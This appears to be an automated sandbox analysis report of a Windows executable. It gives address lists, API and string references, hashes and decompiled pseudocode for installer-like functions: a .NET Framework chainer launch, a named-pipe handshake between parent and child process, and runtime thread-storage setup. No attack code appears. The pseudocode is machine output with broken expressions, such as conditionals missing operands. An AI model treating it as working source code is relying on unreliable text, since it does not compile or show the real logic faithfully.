                                                                                                                                                                  0x00424c79
                                                                                                                                                                  0x00424c82
                                                                                                                                                                  0x00424c8b
                                                                                                                                                                  0x00424c92
                                                                                                                                                                  0x00424c9a
                                                                                                                                                                  0x00424ca5
                                                                                                                                                                  0x00424ca6
                                                                                                                                                                  0x00424ca7
                                                                                                                                                                  0x00424cac
                                                                                                                                                                  0x00424cb4
                                                                                                                                                                  0x00424cb7
                                                                                                                                                                  0x00424cba
                                                                                                                                                                  0x00424cbd
                                                                                                                                                                  0x00424cc0
                                                                                                                                                                  0x00424cc3
                                                                                                                                                                  0x00424cd0
                                                                                                                                                                  0x00424cd1
                                                                                                                                                                  0x00424cd2
                                                                                                                                                                  0x00424cd6
                                                                                                                                                                  0x00424cd7
                                                                                                                                                                  0x00424cdb
                                                                                                                                                                  0x00424cde
                                                                                                                                                                  0x00424ce9
                                                                                                                                                                  0x00424cfb
                                                                                                                                                                  0x00424cff
                                                                                                                                                                  0x00424d05
                                                                                                                                                                  0x00424d07
                                                                                                                                                                  0x00424d35
                                                                                                                                                                  0x00424d3f
                                                                                                                                                                  0x00424d41
                                                                                                                                                                  0x00424d64
                                                                                                                                                                  0x00424d66
                                                                                                                                                                  0x00424d81
                                                                                                                                                                  0x00424d83
                                                                                                                                                                  0x00424d85
                                                                                                                                                                  0x00424d8e
                                                                                                                                                                  0x00424da5
                                                                                                                                                                  0x00424daa
                                                                                                                                                                  0x00424dac
                                                                                                                                                                  0x00424dbd
                                                                                                                                                                  0x00424de0
                                                                                                                                                                  0x00424deb
                                                                                                                                                                  0x00424df1
                                                                                                                                                                  0x00424df3
                                                                                                                                                                  0x00424e40
                                                                                                                                                                  0x00424e43
                                                                                                                                                                  0x00424e49
                                                                                                                                                                  0x00424e52
                                                                                                                                                                  0x00424e88
                                                                                                                                                                  0x00424e95
                                                                                                                                                                  0x00424e97
                                                                                                                                                                  0x00424e99
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424e5a
                                                                                                                                                                  0x00424e5d
                                                                                                                                                                  0x00424e83
                                                                                                                                                                  0x00424e86
                                                                                                                                                                  0x00424f05
                                                                                                                                                                  0x00424f14
                                                                                                                                                                  0x00424f16
                                                                                                                                                                  0x00424f1e
                                                                                                                                                                  0x00424f20
                                                                                                                                                                  0x00424f2e
                                                                                                                                                                  0x00424f33
                                                                                                                                                                  0x00424e76
                                                                                                                                                                  0x00424e76
                                                                                                                                                                  0x00424e77
                                                                                                                                                                  0x00424f7b
                                                                                                                                                                  0x00424f7f
                                                                                                                                                                  0x00424f84
                                                                                                                                                                  0x00424f84
                                                                                                                                                                  0x00424f8d
                                                                                                                                                                  0x00424f92
                                                                                                                                                                  0x00424f92
                                                                                                                                                                  0x00424f9b
                                                                                                                                                                  0x00424fa0
                                                                                                                                                                  0x00424fa0
                                                                                                                                                                  0x00424fa6
                                                                                                                                                                  0x00424fb2
                                                                                                                                                                  0x00424fb8
                                                                                                                                                                  0x00424fc0
                                                                                                                                                                  0x00424fc2
                                                                                                                                                                  0x00424fc2
                                                                                                                                                                  0x00424fd0
                                                                                                                                                                  0x00424fd8
                                                                                                                                                                  0x00424fd8
                                                                                                                                                                  0x00424fea
                                                                                                                                                                  0x00424fea
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424e86
                                                                                                                                                                  0x00424e6b
                                                                                                                                                                  0x00424e6d
                                                                                                                                                                  0x00424e6f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424e71
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424e71
                                                                                                                                                                  0x00424ea0
                                                                                                                                                                  0x00424ea5
                                                                                                                                                                  0x00424eab
                                                                                                                                                                  0x00424ead
                                                                                                                                                                  0x00424eb2
                                                                                                                                                                  0x00424f3d
                                                                                                                                                                  0x00424f40
                                                                                                                                                                  0x00424f42
                                                                                                                                                                  0x00424f49
                                                                                                                                                                  0x00424f4f
                                                                                                                                                                  0x00424f50
                                                                                                                                                                  0x00424f51
                                                                                                                                                                  0x00424f52
                                                                                                                                                                  0x00424f53
                                                                                                                                                                  0x00424f5a
                                                                                                                                                                  0x00424f5a
                                                                                                                                                                  0x00424f5a
                                                                                                                                                                  0x00424f68
                                                                                                                                                                  0x00424f72
                                                                                                                                                                  0x00424f78
                                                                                                                                                                  0x00424f78
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424f42
                                                                                                                                                                  0x00424ebf
                                                                                                                                                                  0x00424ec5
                                                                                                                                                                  0x00424ec7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424ecd
                                                                                                                                                                  0x00424edc
                                                                                                                                                                  0x00424ede
                                                                                                                                                                  0x00424ee6
                                                                                                                                                                  0x00424ee8
                                                                                                                                                                  0x00424ef6
                                                                                                                                                                  0x00424efb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424efb
                                                                                                                                                                  0x00424df5
                                                                                                                                                                  0x00424e04
                                                                                                                                                                  0x00424e06
                                                                                                                                                                  0x00424e0e
                                                                                                                                                                  0x00424e10
                                                                                                                                                                  0x00424e1e
                                                                                                                                                                  0x00424e2a
                                                                                                                                                                  0x00424e32
                                                                                                                                                                  0x00424e32
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424e32
                                                                                                                                                                  0x00424dae
                                                                                                                                                                  0x00424db3
                                                                                                                                                                  0x00424db3
                                                                                                                                                                  0x00424db4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424dba
                                                                                                                                                                  0x00424d87
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424d87
                                                                                                                                                                  0x00424d68
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424d68
                                                                                                                                                                  0x00424d43
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424d43
                                                                                                                                                                  0x00424d09
                                                                                                                                                                  0x00424d19
                                                                                                                                                                  0x00424d1e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424d1e
                                                                                                                                                                  0x00424ceb
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 00424CDE
                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000027), ref: 00424CFF
                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 00424E95
                                                                                                                                                                  • GetExitCodeProcess.KERNEL32 ref: 00424EBF
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 00424ECD
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 00424F05
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,NetFxChainer.cpp,000001AB,00000000,?,?,?,?), ref: 00424FC0
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,NetFxChainer.cpp,000001AB,00000000,?,?,?,?), ref: 00424FD8
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to convert netfx chainer guid into string., xrefs: 00424D1E
                                                                                                                                                                  • NetFxSection.%ls, xrefs: 00424D2F
                                                                                                                                                                  • Failed to create netfx chainer., xrefs: 00424D87
                                                                                                                                                                  • Failed to create netfx chainer guid., xrefs: 00424CEB
                                                                                                                                                                  • Failed to allocate netfx chainer arguments., xrefs: 00424DAE
                                                                                                                                                                  • Failed to allocate event name., xrefs: 00424D68
                                                                                                                                                                  • Failed to process netfx chainer message., xrefs: 00424E71
                                                                                                                                                                  • Failed to wait for netfx chainer process to complete, xrefs: 00424F33
                                                                                                                                                                  • D, xrefs: 00424DE0
                                                                                                                                                                  • %ls /pipe %ls, xrefs: 00424D9A
                                                                                                                                                                  • NetFxChainer.cpp, xrefs: 00424D14, 00424E19, 00424EF1, 00424F29
                                                                                                                                                                  • NetFxEvent.%ls, xrefs: 00424D54
                                                                                                                                                                  • Failed to CreateProcess on path: %ls, xrefs: 00424E24
                                                                                                                                                                  • Failed to allocate section name., xrefs: 00424D43
                                                                                                                                                                  • Failed to get netfx return code., xrefs: 00424EFB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseErrorHandleLast$CodeCreateExitFromMultipleObjectsProcessStringUuidWait
                                                                                                                                                                  • String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
                                                                                                                                                                  • API String ID: 454750362-1825855094
                                                                                                                                                                  • Opcode ID: a57de1181b58bdda0f1c6591c98084430fa2e4931438abaadfd89eb2da5ea3b2
                                                                                                                                                                  • Instruction ID: 1eb0f61384c4fa649436f4f89bfd7dcd9db128c7bd832b35c197359962eda6aa
                                                                                                                                                                  • Opcode Fuzzy Hash: a57de1181b58bdda0f1c6591c98084430fa2e4931438abaadfd89eb2da5ea3b2
                                                                                                                                                                  • Instruction Fuzzy Hash: D4A1A171E40228AFEB20DBB5DC45BAEB6B8EF48714F11016BE908F7251D7788D418F99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F9DC, Relevance: 44.0, APIs: 17, Strings: 8, Instructions: 221filepipesleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                  			E0040F9DC(long _a4) {
				long _v8;
				signed int _v12;
				void _v16;
				signed int _v20;
				void* _v24;
				void _v28;
				void _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				WCHAR* _t40;
				long _t43;
				signed int _t44;
				signed short _t48;
				signed short _t56;
				signed short _t62;
				signed short _t67;
				signed short _t73;
				signed short _t79;
				void* _t83;
				long _t84;
				signed int _t88;
				void* _t109;

				_t84 = _a4;
				_v40 =  *((intOrPtr*)(_t84 + 0x10));
				_v36 =  *((intOrPtr*)(_t84 + 0x14));
				_t40 =  *(_t84 + 4);
				_t88 = 0;
				_v24 = _t40;
				_v16 = lstrlenW(_t40) + _t41;
				_t43 = GetCurrentProcessId();
				_v32 = _v32 & 0;
				_a4 = _a4 & 0;
				_v28 = _t43;
				_t44 = 0;
				_v20 = 0;
				while(1) {
					L1:
					_t83 =  *(_t109 + _t44 * 4 - 0x24);
					if(_t83 == 0xffffffff) {
						break;
					}
					_v8 = 1;
					if(SetNamedPipeHandleState(_t83,  &_v8, 0, 0) == 0) {
						_t48 = GetLastError();
						_t91 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
						_t88 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "pipe.cpp", 0x1d6, _t88);
						_push("Failed to set pipe to non-blocking.");
						goto L28;
					} else {
						_v12 = _v12 & 0x00000000;
						do {
							if(ConnectNamedPipe(_t83, 0) != 0) {
								goto L9;
							} else {
								_t52 = GetLastError();
								if(_t52 == 0x217) {
									_t88 = 0;
									L11:
									_v8 = _v8 & 0x00000000;
									if(SetNamedPipeHandleState(_t83,  &_v8, 0, 0) == 0) {
										_t56 = GetLastError();
										_t94 =  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
										_t88 =  >=  ? 0x80004005 :  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
										E004300D9(0x80004005, "pipe.cpp", 0x201, _t88);
										_push("Failed to reset pipe to blocking.");
										goto L28;
									} else {
										if(WriteFile(_t83,  &_v16, 4,  &_a4, 0) == 0) {
											_t62 = GetLastError();
											_t97 =  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
											_t88 =  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
											E004300D9(0x80004005, "pipe.cpp", 0x207, _t88);
											_push("Failed to write secret length to pipe.");
											goto L28;
										} else {
											if(WriteFile(_t83, _v24, _v16,  &_a4, 0) == 0) {
												_t67 = GetLastError();
												_t100 =  <=  ? _t67 : _t67 & 0x0000ffff | 0x80070000;
												_t88 =  >=  ? 0x80004005 :  <=  ? _t67 : _t67 & 0x0000ffff | 0x80070000;
												E004300D9(0x80004005, "pipe.cpp", 0x20c, _t88);
												_push("Failed to write secret to pipe.");
												goto L28;
											} else {
												if(WriteFile(_t83,  &_v28, 4,  &_a4, 0) == 0) {
													_t73 = GetLastError();
													_t103 =  <=  ? _t73 : _t73 & 0x0000ffff | 0x80070000;
													_t88 =  >=  ? 0x80004005 :  <=  ? _t73 : _t73 & 0x0000ffff | 0x80070000;
													E004300D9(0x80004005, "pipe.cpp", 0x211, _t88);
													_push("Failed to write our process id to pipe.");
													goto L28;
												} else {
													if(ReadFile(_t83,  &_v32, 4,  &_a4, 0) == 0) {
														_t79 = GetLastError();
														_t106 =  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
														_t88 =  >=  ? 0x80004005 :  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
														E004300D9(0x80004005, "pipe.cpp", 0x217, _t88);
														_push("Failed to read ACK from pipe.");
														goto L28;
													} else {
														_t44 = _v20 + 1;
														_v20 = _t44;
														if(_t44 < 2) {
															goto L1;
														} else {
														}
													}
												}
											}
										}
									}
								} else {
									if(_t52 != 0x218) {
										_t88 =  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
										break;
									} else {
										_t52 = _v12;
										if(_t52 >= 0x708) {
											_t88 = 0x800705b4;
											L21:
											E004300D9(_t52, "pipe.cpp", 0x1fb, _t88);
											_push("Failed to wait for child to connect to pipe.");
											L28:
											_push(_t88);
											E00430A57();
										} else {
											_t52 = _t52 + 1;
											_t88 = 0x80070218;
											_v12 = _t52;
											Sleep(0x64);
											goto L9;
										}
									}
								}
							}
							goto L29;
							L9:
						} while (_t88 == 0x80070218);
						if(_t88 < 0) {
							goto L21;
						} else {
							goto L11;
						}
					}
					break;
				}
				L29:
				return _t88;
			}

























                                                                                                                                                                  0x0040f9e2
                                                                                                                                                                  0x0040f9e9
                                                                                                                                                                  0x0040f9f0
                                                                                                                                                                  0x0040f9f3
                                                                                                                                                                  0x0040f9f8
                                                                                                                                                                  0x0040f9fa
                                                                                                                                                                  0x0040fa05
                                                                                                                                                                  0x0040fa08
                                                                                                                                                                  0x0040fa0e
                                                                                                                                                                  0x0040fa11
                                                                                                                                                                  0x0040fa1a
                                                                                                                                                                  0x0040fa1d
                                                                                                                                                                  0x0040fa1f
                                                                                                                                                                  0x0040fa22
                                                                                                                                                                  0x0040fa22
                                                                                                                                                                  0x0040fa22
                                                                                                                                                                  0x0040fa29
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fa38
                                                                                                                                                                  0x0040fa47
                                                                                                                                                                  0x0040fc74
                                                                                                                                                                  0x0040fc81
                                                                                                                                                                  0x0040fc8b
                                                                                                                                                                  0x0040fc99
                                                                                                                                                                  0x0040fc9e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fa4d
                                                                                                                                                                  0x0040fa4d
                                                                                                                                                                  0x0040fa51
                                                                                                                                                                  0x0040fa5c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fa5e
                                                                                                                                                                  0x0040fa5e
                                                                                                                                                                  0x0040fa65
                                                                                                                                                                  0x0040fb50
                                                                                                                                                                  0x0040faa5
                                                                                                                                                                  0x0040faa5
                                                                                                                                                                  0x0040faba
                                                                                                                                                                  0x0040fc43
                                                                                                                                                                  0x0040fc50
                                                                                                                                                                  0x0040fc5a
                                                                                                                                                                  0x0040fc68
                                                                                                                                                                  0x0040fc6d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fac0
                                                                                                                                                                  0x0040fad5
                                                                                                                                                                  0x0040fc12
                                                                                                                                                                  0x0040fc1f
                                                                                                                                                                  0x0040fc29
                                                                                                                                                                  0x0040fc37
                                                                                                                                                                  0x0040fc3c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fadb
                                                                                                                                                                  0x0040faf0
                                                                                                                                                                  0x0040fbde
                                                                                                                                                                  0x0040fbeb
                                                                                                                                                                  0x0040fbf5
                                                                                                                                                                  0x0040fc03
                                                                                                                                                                  0x0040fc08
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040faf6
                                                                                                                                                                  0x0040fb0b
                                                                                                                                                                  0x0040fbaa
                                                                                                                                                                  0x0040fbb7
                                                                                                                                                                  0x0040fbc1
                                                                                                                                                                  0x0040fbcf
                                                                                                                                                                  0x0040fbd4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fb11
                                                                                                                                                                  0x0040fb26
                                                                                                                                                                  0x0040fb76
                                                                                                                                                                  0x0040fb83
                                                                                                                                                                  0x0040fb8d
                                                                                                                                                                  0x0040fb9b
                                                                                                                                                                  0x0040fba0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fb28
                                                                                                                                                                  0x0040fb2b
                                                                                                                                                                  0x0040fb2c
                                                                                                                                                                  0x0040fb32
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fb38
                                                                                                                                                                  0x0040fb32
                                                                                                                                                                  0x0040fb26
                                                                                                                                                                  0x0040fb0b
                                                                                                                                                                  0x0040faf0
                                                                                                                                                                  0x0040fad5
                                                                                                                                                                  0x0040fa6b
                                                                                                                                                                  0x0040fa70
                                                                                                                                                                  0x0040fb48
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fa76
                                                                                                                                                                  0x0040fa76
                                                                                                                                                                  0x0040fa7e
                                                                                                                                                                  0x0040fb57
                                                                                                                                                                  0x0040fb5c
                                                                                                                                                                  0x0040fb67
                                                                                                                                                                  0x0040fb6c
                                                                                                                                                                  0x0040fca3
                                                                                                                                                                  0x0040fca3
                                                                                                                                                                  0x0040fca4
                                                                                                                                                                  0x0040fa84
                                                                                                                                                                  0x0040fa84
                                                                                                                                                                  0x0040fa87
                                                                                                                                                                  0x0040fa8c
                                                                                                                                                                  0x0040fa8f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fa8f
                                                                                                                                                                  0x0040fa7e
                                                                                                                                                                  0x0040fa70
                                                                                                                                                                  0x0040fa65
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fa95
                                                                                                                                                                  0x0040fa95
                                                                                                                                                                  0x0040fa9f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fa9f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fa47
                                                                                                                                                                  0x0040fcac
                                                                                                                                                                  0x0040fcb1

                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,0000046C,00000000,?,00401105,00000000,8BE275C0,?,00401414,00000000), ref: 0040F9FD
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00401105,00000000,8BE275C0,?,00401414,00000000), ref: 0040FA08
                                                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,00401105,00000000,8BE275C0,?,00401414,00000000), ref: 0040FA3F
                                                                                                                                                                  • ConnectNamedPipe.KERNEL32(?,00000000,?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FA54
                                                                                                                                                                  • GetLastError.KERNEL32(?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FA5E
                                                                                                                                                                  • Sleep.KERNEL32(00000064,?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FA8F
                                                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FAB2
                                                                                                                                                                  • WriteFile.KERNEL32(?,00401414,00000004,00000000,00000000,?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FACD
                                                                                                                                                                  • WriteFile.KERNEL32(?,8BE275C0,00401414,00000000,00000000,?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FAE8
                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000004,00000000,00000000,?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FB03
                                                                                                                                                                  • ReadFile.KERNEL32(?,00401105,00000004,00000000,00000000,?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FB1E
                                                                                                                                                                  • GetLastError.KERNEL32(?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FB76
                                                                                                                                                                  • GetLastError.KERNEL32(?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FBAA
                                                                                                                                                                  • GetLastError.KERNEL32(?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FBDE
                                                                                                                                                                  • GetLastError.KERNEL32(?,00401105,00000000,8BE275C0,?,00401414,00000000), ref: 0040FC74
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
                                                                                                                                                                  • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$pipe.cpp
                                                                                                                                                                  • API String ID: 2944378912-2009266399
                                                                                                                                                                  • Opcode ID: 986e2ce386f91985788ffe928dfd5e8203d4ff1712cea65f578d2d37fd26a131
                                                                                                                                                                  • Instruction ID: 4d7a7f9e5786017a8f1906c7c50a162a1675cb7dcb15adddf823dbf4dc0414ff
                                                                                                                                                                  • Opcode Fuzzy Hash: 986e2ce386f91985788ffe928dfd5e8203d4ff1712cea65f578d2d37fd26a131
                                                                                                                                                                  • Instruction Fuzzy Hash: CE619376E40325AAFB209AB58D46BAB76E8FB04741F214136BE05F71C0D67C9D018AED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10011936, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E10011936(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x10335478 = GetProcAddress(_t37, "FlsAlloc");
					 *0x1033547c = GetProcAddress(_t37, "FlsGetValue");
					 *0x10335480 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10335478;
					_t40 = TlsSetValue;
					 *0x10335484 = _t7;
					if( *0x10335478 == 0) {
						L6:
						 *0x1033547c = TlsGetValue;
						 *0x10335478 = E100115ED;
						 *0x10335480 = _t40;
						 *0x10335484 = TlsFree;
					} else {
						__eflags =  *0x1033547c;
						if( *0x1033547c == 0) {
							goto L6;
						} else {
							__eflags =  *0x10335480;
							if( *0x10335480 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10334594 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x1033547c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10011D56();
							 *0x10335478 = E1001151E( *0x10335478);
							 *0x1033547c = E1001151E( *0x1033547c);
							 *0x10335480 = E1001151E( *0x10335480);
							 *0x10335484 = E1001151E( *0x10335484);
							_t18 = E1000F8ED();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10011620();
								goto L15;
							} else {
								_push(L100117AC);
								_t21 =  *((intOrPtr*)(E1001158A( *0x10335478)))();
								__eflags = _t21 - 0xffffffff;
								 *0x10334590 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E10014911(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x10334590);
										__eflags =  *((intOrPtr*)(E1001158A( *0x10335480)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E1001165D(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10011620();
					return 0;
				}
			}
















                                                                                                                                                                  0x10011936
                                                                                                                                                                  0x10011942
                                                                                                                                                                  0x10011946
                                                                                                                                                                  0x10011966
                                                                                                                                                                  0x10011973
                                                                                                                                                                  0x10011980
                                                                                                                                                                  0x10011985
                                                                                                                                                                  0x10011987
                                                                                                                                                                  0x1001198e
                                                                                                                                                                  0x10011994
                                                                                                                                                                  0x10011999
                                                                                                                                                                  0x100119b1
                                                                                                                                                                  0x100119b6
                                                                                                                                                                  0x100119c0
                                                                                                                                                                  0x100119ca
                                                                                                                                                                  0x100119d0
                                                                                                                                                                  0x1001199b
                                                                                                                                                                  0x1001199b
                                                                                                                                                                  0x100119a2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100119a4
                                                                                                                                                                  0x100119a4
                                                                                                                                                                  0x100119ab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100119ad
                                                                                                                                                                  0x100119ad
                                                                                                                                                                  0x100119af
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100119af
                                                                                                                                                                  0x100119ab
                                                                                                                                                                  0x100119a2
                                                                                                                                                                  0x100119d5
                                                                                                                                                                  0x100119db
                                                                                                                                                                  0x100119de
                                                                                                                                                                  0x100119e3
                                                                                                                                                                  0x10011ab5
                                                                                                                                                                  0x10011ab5
                                                                                                                                                                  0x10011ab5
                                                                                                                                                                  0x100119e9
                                                                                                                                                                  0x100119f0
                                                                                                                                                                  0x100119f2
                                                                                                                                                                  0x100119f4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100119fa
                                                                                                                                                                  0x100119fa
                                                                                                                                                                  0x10011a10
                                                                                                                                                                  0x10011a20
                                                                                                                                                                  0x10011a30
                                                                                                                                                                  0x10011a3d
                                                                                                                                                                  0x10011a42
                                                                                                                                                                  0x10011a47
                                                                                                                                                                  0x10011a49
                                                                                                                                                                  0x10011ab0
                                                                                                                                                                  0x10011ab0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10011a4b
                                                                                                                                                                  0x10011a4b
                                                                                                                                                                  0x10011a5c
                                                                                                                                                                  0x10011a5e
                                                                                                                                                                  0x10011a61
                                                                                                                                                                  0x10011a66
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10011a68
                                                                                                                                                                  0x10011a74
                                                                                                                                                                  0x10011a76
                                                                                                                                                                  0x10011a7a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10011a7c
                                                                                                                                                                  0x10011a7c
                                                                                                                                                                  0x10011a7d
                                                                                                                                                                  0x10011a91
                                                                                                                                                                  0x10011a93
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10011a95
                                                                                                                                                                  0x10011a95
                                                                                                                                                                  0x10011a97
                                                                                                                                                                  0x10011a98
                                                                                                                                                                  0x10011a9f
                                                                                                                                                                  0x10011aa5
                                                                                                                                                                  0x10011aa9
                                                                                                                                                                  0x10011aad
                                                                                                                                                                  0x10011aad
                                                                                                                                                                  0x10011a93
                                                                                                                                                                  0x10011a7a
                                                                                                                                                                  0x10011a66
                                                                                                                                                                  0x10011a49
                                                                                                                                                                  0x100119f4
                                                                                                                                                                  0x10011ab9
                                                                                                                                                                  0x10011948
